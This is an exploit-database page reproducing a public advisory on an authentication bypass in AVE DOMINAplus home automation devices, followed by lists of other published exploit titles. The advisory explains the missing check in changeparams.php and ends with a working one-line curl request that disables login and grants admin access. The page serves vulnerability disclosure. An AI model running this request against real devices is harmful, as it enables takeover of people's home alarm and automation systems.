Menu

Search for hundreds of thousands of exploits

"AVE DOMINAplus 1.10.x - Authentication Bypass"

Author

Exploit author

LiquidWorm

Platform

Exploit platform

hardware

Release date

Exploit published date

2019-12-30

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
# Exploit: AVE DOMINAplus 1.10.x - Authentication Bypass
# Date: 2019-12-30
# Author: LiquidWorm
# Vendor: AVE S.p.A.
# Product web page: https://www.ave.it | https://www.domoticaplus.it
# Affected version: Web Server Code 53AB-WBS - 1.10.62
# Advisory ID: ZSL-2019-5549
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php

AVE DOMINAplus <=1.10.x Authentication Bypass Exploit


Vendor: AVE S.p.A.
Product web page: https://www.ave.it | https://www.domoticaplus.it
Affected version: Web Server Code 53AB-WBS - 1.10.62
                  Touch Screen Code TS01 - 1.0.65
                  Touch Screen Code TS03x-V | TS04X-V - 1.10.45a
                  Touch Screen Code TS05 - 1.10.36
                  Models: 53AB-WBS
                          TS01
                          TS03V
                          TS04X-V
                          TS05N-V
                  App version: 1.10.77
                  App version: 1.10.65
                  App version: 1.10.64
                  App version: 1.10.62
                  App version: 1.10.60
                  App version: 1.10.52
                  App version: 1.10.52A
                  App version: 1.10.49
                  App version: 1.10.46
                  App version: 1.10.45
                  App version: 1.10.44
                  App version: 1.10.35
                  App version: 1.10.25
                  App version: 1.10.22
                  App version: 1.10.11
                  App version: 1.8.4
                  App version: TS1-1.0.65
                  App version: TS1-1.0.62
                  App version: TS1-1.0.44
                  App version: TS1-1.0.10
                  App version: TS1-1.0.9

Summary: DOMINAplus - Sistema Domotica Avanzato. Advanced Home Automation System.
Designed to revolutionize your concept of living. DOMINA plus is the AVE home
automation proposal that makes houses safer, more welcoming and optimized. In
fact, our home automation system introduces cutting-edge technologies, designed
to improve people's lifestyle. DOMINA plus increases comfort, the level of safety
and security and offers advanced supervision tools in order to learn how to
evaluate and reduce consumption through various solutions dedicated to energy
saving.

Desc: DOMINAplus suffers from an authentication bypass vulnerability due to missing
control check when directly calling the autologin GET parameter in changeparams.php
script. Setting the autologin value to 1 allows an unauthenticated attacker to
permanently disable the authentication security control and access the management
interface with admin privileges without providing credentials.

Tested on: GNU/Linux 4.1.19-armv7-x7
           GNU/Linux 3.8.13-bone50/bone71.1/bone86
           Apache/2.4.7 (Ubuntu)
           Apache/2.2.22 (Debian)
           PHP/5.5.9-1ubuntu4.23
           PHP/5.4.41-0+deb7u1
           PHP/5.4.36-0+deb7u3


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2019-5549
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5549.php


06.10.2019

--


#
# Mina... Mina, open your eyes!
#

$ curl -s http://192.168.1.10/changeparams.php?operazione=3&autologin=1
1
Release DateTitleTypePlatformAuthor
2020-04-03"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-03"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-04-02"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)"localwindows"Paras Bhatia"
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
Release DateTitleTypePlatformAuthor
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-24"UCM6202 1.0.18.13 - Remote Command Injection"webappshardware"Jacob Baines"
2020-03-18"Netlink GPON Router 1.0.11 - Remote Code Execution"webappshardwareshellord
2020-03-18"Microtik SSH Daemon 6.44.3 - Denial of Service (PoC)"remotehardwareFarazPajohan
2020-03-13"Drobo 5N2 4.1.1 - Remote Command Injection"remotehardware"Ian Sindermann"
2020-03-03"RICOH Aficio SP 5200S Printer - 'entryNameIn' HTML Injection"webappshardware"Paulina Girón"
2020-03-03"RICOH Aficio SP 5210SF Printer - 'entryNameIn' HTML Injection"webappshardware"Olga Villagran"
2020-03-02"TL-WR849N 0.9.1 4.16 - Authentication Bypass (Upload Firmware)"webappshardware"Elber Tavares"
2020-03-02"TP LINK TL-WR849N - Remote Code Execution"webappshardware"Elber Tavares"
2020-03-02"Netis WF2419 2.2.36123 - Remote Code Execution"webappshardware"Elias Issa"
2020-03-02"Intelbras Wireless N 150Mbps WRN240 - Authentication Bypass (Config Upload)"webappshardware"Elber Tavares"
2020-02-27"Comtrend VR-3033 - Command Injection"webappshardware"Raki Ben Hamouda"
2020-02-24"SecuSTATION SC-831 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Aptina AR0130 960P 1.3MP Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"ESCAM QD-900 WIFI HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"SecuSTATION IPCAM-130 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-24"Avaya IP Office Application Server 11.0.0.0 - Reflective Cross-Site Scripting"webappshardware"Scott Goodwin"
2020-02-24"I6032B-P POE 2.0MP Outdoor Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-19"Nanometrics Centaur 4.3.23 - Unauthenticated Remote Memory Leak"webappshardwarebyteGoblin
2020-02-19"DBPower C300 HD Camera - Remote Configuration Disclosure"webappshardware"Todor Donev"
2020-02-17"Avaya Aura Communication Manager 5.2 - Remote Code Execution"webappshardware"Sarang Tumne"
2020-02-05"HiSilicon DVR/NVR hi3520d firmware - Remote Backdoor Account"remotehardwareSnawoot
2020-02-05"Wago PFC200 - Authenticated Remote Code Execution (Metasploit)"webappshardware0x483d
2020-02-03"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection"webappshardware"Cosmin Craciun"
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2020-01-29"Satellian 1.12 - Remote Code Execution"webappshardwareXh4H
2020-01-24"TP-Link TP-SG105E 1.0.0 - Unauthenticated Remote Reboot"webappshardwarePCEumel
Release DateTitleTypePlatformAuthor
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-01-29"Fifthplay S.A.M.I 2019.2_HP - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Persistent Cross-Site Scripting"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Unauthenticated Remote Reboot"webappshardwareLiquidWorm
2019-12-30"Thrive Smart Home 1.1 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Cross-Site Request Forgery (enable/disable alarm)"webappshardwareLiquidWorm
2019-12-30"WEMS BEMS 21.3.1 - Undocumented Backdoor Account"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Cross-Site Request Forgery (Add Admin)"webappsphpLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Authentication Bypass"webappshardwareLiquidWorm
2019-12-30"MyDomoAtHome REST API Domoticz ISS Gateway 0.2.40 - Information Disclosure"webappshardwareLiquidWorm
2019-12-30"AVE DOMINAplus 1.10.x - Credential Disclosure"webappshardwareLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Authentication Bypass"webappsphpLiquidWorm
2019-12-30"HomeAutomation 3.3.2 - Remote Code Execution"webappsphpLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Remote Command Execution"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Unauthenticated Server-Side Request Forgery"webappshardwareLiquidWorm
2019-12-10"Inim Electronics Smartliving SmartLAN 6.x - Hard-coded Credentials"localhardwareLiquidWorm
2019-12-02"SmartHouse Webapp 6.5.33 - Cross-Site Request Forgery"webappsphpLiquidWorm
2019-11-14"Siemens Desigo PX 6.00 - Denial of Service (PoC)"doshardwareLiquidWorm
2019-11-13"Linear eMerge E3 1.00-06 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution"remotehardwareLiquidWorm
2019-11-12"FlexAir Access Control 2.3.35 - Authentication Bypass"webappshardwareLiquidWorm
2019-11-12"Optergy 2.3.0a - Remote Code Execution (Backdoor)"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Arbitrary File Upload"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Unauthenticated Directory Traversal"webappshardwareLiquidWorm
2019-11-12"Optergy 2.3.0a - Cross-Site Request Forgery (Add Admin)"webappshardwareLiquidWorm
2019-11-12"FlexAir Access Control 2.4.9api3 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"CBAS-Web 19.0.0 - Remote Code Execution"webappshardwareLiquidWorm
2019-11-12"eMerge E3 1.00-06 - Cross-Site Request Forgery"webappshardwareLiquidWorm
2019-11-12"eMerge E3 Access Controller 4.6.07 - Remote Code Execution (Metasploit)"remotehardwareLiquidWorm
2019-11-12"Prima Access Control 2.3.35 - 'HwName' Persistent Cross-Site Scripting"webappsalphaLiquidWorm
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/47822/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse